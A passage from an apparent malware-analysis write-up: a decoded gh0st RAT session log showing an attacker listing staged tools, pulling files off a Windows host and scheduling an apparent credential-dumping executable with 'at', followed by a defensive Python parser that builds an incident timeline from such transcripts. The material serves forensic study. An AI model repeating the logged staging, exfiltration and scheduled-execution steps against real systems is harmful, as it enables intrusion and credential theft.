DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR https.dll 5282 129984516342112452
DIR netstat.dll 109092 129984523001118148
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\netstat.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\netstat.dll: 109092)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
...snip...
COMMAND: CONTINUE
TOKEN: FILE DATA (2713)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
net time
net time
Current time at \\DC-USTXHOU is 11/26/2012 7:25 PM
The command completed successfully.
C:\WINDOWS\webui>
COMMAND: FILE SIZE (C:\WINDOWS\webui\system5.bat: 88)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (88)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR https.dll 5282 129984516342112452
DIR netstat.dll 109092 129984523001118148
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR system5.bat 88 129984532078388142
DIR wc.exe 208384 129984448197760606
system5.bat
system5.bat
1 file(s) copied.
Added a new job with job ID = 1
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
net time
net time
Current time at \\DC-USTXHOU is 11/26/2012 7:31 PM
The command completed successfully.
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
at
at
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 7:30 PM wc.exe -e -o h.out
C:\WINDOWS\webui>
net start
net start
These Windows services are started:
Application Layer Gateway Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Logical Disk Manager
Microsoft Device Manager
Net Logon
Network Connections
Network Location Awareness (NLA)
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
SSDP Discovery Service
System Event Notification
System Restore Service
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
Themes
WebClient
Windows Audio
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Time
Wireless Zero Configuration
Workstation
The command completed successfully.
C:\WINDOWS\webui>
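As an added example (not part of the original write-up, and not code from ChopShop or its gh0st_decode module), here is a small Python parser that turns a decoded session like the one above into a defender's timeline: the shell commands the attacker typed (each one appears twice in the decoded stream because the shell echoes it back, so the duplicate is dropped), the files pushed to the host (COMMAND: FILE SIZE), the files pulled back to the attacker (COMMAND: DOWN FILES), and the FILE LIST entries with their WRITE TIME column converted to UTC. The sample transcript inside the block is a constructed excerpt of the session, and treating WRITE TIME as a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) is an assumption; it can be checked against the session's own `dir` output, since 129984448080090049 comes out as 23:06:48 UTC on 2012-11-26, which is the 05:06 PM shown for gs.exe if the host clock is on US Central time.

```python
"""Added example: parse a ChopShop gh0st_decode transcript into a timeline.

Assumptions (not stated on the page): the WRITE TIME column of a FILE LIST is a
Windows FILETIME, and every shell command is immediately echoed back once.
"""
import re
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

UPLOAD_RE = re.compile(r"^COMMAND: FILE SIZE \((.+): (\d+)\)$")   # file pushed to host
DOWNLOAD_RE = re.compile(r"^COMMAND: DOWN FILES \((.+)\)$")        # file pulled from host
LIST_RE = re.compile(r"^COMMAND: LIST FILES \((.+)\)$")            # directory being listed
ENTRY_RE = re.compile(r"^(?:DIR|FILE) (.+) (\d+) (\d+)$")          # name, size, FILETIME
DRIVE_RE = re.compile(r"^[A-Z] \d+ \d+ ")                          # DRIVE LIST rows
PROMPT_RE = re.compile(r"^[A-Za-z]:\\.*>$")                        # cmd.exe prompt
PROTOCOL_PREFIXES = ("COMMAND:", "TOKEN:", "TYPE NAME", "DRIVE TOTAL", "..")

# Constructed excerpt of the decoded session (not the original pcap output).
SAMPLE_SESSION = """\
COMMAND: SHELL
TOKEN: SHELL START
C:\\WINDOWS\\system32>
cd ..
cd ..
C:\\WINDOWS>
mkdir webui
mkdir webui
C:\\WINDOWS>
COMMAND: FILE SIZE (C:\\WINDOWS\\webui\\sl.exe: 20480)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\\WINDOWS\\webui\\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR sl.exe 20480 129984448163068888
COMMAND: DOWN FILES (C:\\WINDOWS\\webui\\netuse.dll)
TOKEN: FILE SIZE (C:\\WINDOWS\\webui\\netuse.dll: 11844)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
ipconfig
ipconfig
Windows IP Configuration
"""


def filetime_to_utc(ft: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601) to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def is_protocol(line: str) -> bool:
    """True for gh0st protocol lines, listing rows and '...snip...' markers."""
    return (line.startswith(PROTOCOL_PREFIXES)
            or bool(ENTRY_RE.match(line)) or bool(DRIVE_RE.match(line)))


def parse_session(text: str) -> dict:
    """Return commands typed, uploads, downloads and listings found in the transcript."""
    result = {"commands": [], "uploads": [], "downloads": [], "listings": []}
    lines = text.splitlines()
    awaiting_cmd = False   # a prompt was seen; the next shell line is the command
    cur_dir = None         # directory of the FILE LIST currently being read
    i = 0
    while i < len(lines):
        line = lines[i]
        if is_protocol(line):
            m = UPLOAD_RE.match(line)
            if m:
                result["uploads"].append((m.group(1), int(m.group(2))))
            m = DOWNLOAD_RE.match(line)
            if m:
                result["downloads"].append(m.group(1))
            m = LIST_RE.match(line)
            if m:
                cur_dir = m.group(1)
            m = ENTRY_RE.match(line)
            if m:
                result["listings"].append(
                    (cur_dir, m.group(1), int(m.group(2)), filetime_to_utc(int(m.group(3)))))
        elif PROMPT_RE.match(line):
            awaiting_cmd = True
        elif awaiting_cmd and line.strip():
            result["commands"].append(line)
            awaiting_cmd = False
            if i + 1 < len(lines) and lines[i + 1] == line:
                i += 1   # skip the shell's echo of the command
        i += 1
    return result


if __name__ == "__main__":
    r = parse_session(SAMPLE_SESSION)
    print("commands :", r["commands"])
    print("uploads  :", r["uploads"])
    print("downloads:", r["downloads"])
    for d, name, size, when in r["listings"]:
        print(f"listing  : {d}{name} {size} bytes written {when.isoformat()}")
```

Run against the full decoded session, the uploads list gives the staging of ps.exe, gs.exe, ra.exe, sl.exe, wc.exe and system5.bat in order, the downloads list gives what left the host (netuse.dll, system.dll, svchost.dll, https.dll, netstat.dll), and the converted write times line up with the `dir` timestamps once the local time-zone offset is applied, which is a quick consistency check before those times go into an incident timeline.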